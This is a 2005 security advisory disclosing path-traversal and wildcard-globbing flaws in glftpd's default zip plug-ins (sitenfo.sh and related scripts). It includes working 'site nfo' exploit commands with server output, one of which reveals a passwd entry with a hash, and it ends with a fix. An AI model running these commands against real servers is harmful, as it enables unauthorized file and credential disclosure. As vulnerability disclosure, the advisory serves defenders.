Pimp industries. "Its all about the Bling, B^!%@s and Fame!" Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins : sitenfo.sh, sitezipchk.sh, siteziplist.sh (C) Paul Craig - Pimp Industries 2005 Background ------------- glftpd is an open source ftp server used by the more 'hardcore' of ftp servers :) (www.glftpd.com) Exploit: ------------- The exploit is not in glftpd itself, instead inside a suite of zip based plug-ins that come with the glftpd package by default, these plug-ins are widely used in installations of glftpd. This advisory will focus on the plugin sitenfo.sh, a script to allow users to read .nfo and .diz files from within zip archives("SITE NFO" by default). Although the exploits are synonymous with all the .sh scripts listed above. Due to improper input validation several flaws exist in the script that can allow for unprivileged access to files within the glftpd chroot and information disclosure of private files Firstly. Directory transversal to prove the existence of a valid file outside of the ftp siteroot: ftp> site nfo ../etc/grouap 200- dn's NFO Lister v1.00 200- 200- That zipfile (../etc/grouap) does not exist! 200 Error executing command. ftp> site nfo ../etc/group 200- dn's NFO Lister v1.00 200- 200- nfo(s) from ../etc/group: 200- 200 Command Successful. Here we determine that the file ../etc/group exists, a file outside of the default FTP site root. Secondly. Directory transversal globbing attack: Due to improper parsing of *, a user can return the first two files in any directory ($1 $2), including files within 'private' or hidden directory's such as the 'staff' folder. ftp> site nfo ../../../../../etc/* 200- dn's NFO Lister v1.00 200- 200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem: and to view inside private folders within the ftp root (that usually you are unable to see) ftp> site nfo staff/* 200- dn's NFO Lister v1.00 200- 200- staff/Mark from staff/Peter: 200- Command Successful. ftp> cd staff 200- No such file or directory. Here we can see that staff/Mark and staff/Peter exist, although we are unable to even see the directory staff/ by default, since we have no access. This can be further exploited to build a full directory tree by using guided wildcards within the globbed request, such as. site nfo ../../../../../etc/a* site nfo ../../../../../etc/b* site nfo ../../../../../etc/c* And so on and so forth to list all valid files and directories. Finally you can use the script to also view any file inside any zipfile within the glftp root, such as backups or zipfiles in private directories. First, we find a zip file. ftp> site nfo ../../*.zip 200- dn's NFO Lister v1.00 200- 200- nfo(s) from ../../backup.zip: backup.zip exists outside the glftpd site root and is returned in $1 to sitenfo.sh Now we will read all files within backup.zip that begin wtih 'p' ftp> site nfo ../../backup.zip p* 200- dn's NFO Lister v1.00 200- 200- passwd from ../../backup.zip: 200- glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false This will of cause only work for zip compressed files, not gzip files. Combined, these flaws allow a user to browse the glftp chrooted environment and then read any file inside any zip file. Considering zip files may contain sensitive information such as backups or private documents, this exploit could easily lead to further privilege escalation. sitezipchk.sh and siteziplist.sh both contain similar exploits, although I have noticed sitenfo.sh is more frequently used in glftpd sites. Suggestions/Work Around: ------------- Easy solution is to remove sitenfo.sh, siteziplist.sh and sitezipchk.sh from the /bin directory, passing user supplied arguments to shell is never bright and is not worth the security risk. Company status --------------- Pimp Industries is a privately owned New Zealand based security research company. If you would like to contact Pimp Industries to discuss any nature of business, please email us at headpimp at pimp-industries.com. Personal Pimp Hello's fly to: ------------------- The boys at security-assessment.com, pinky, sozni, and you! yes, you! Paul Craig Head Pimp, Security Researcher Pimp Industries "Move fast, think faster"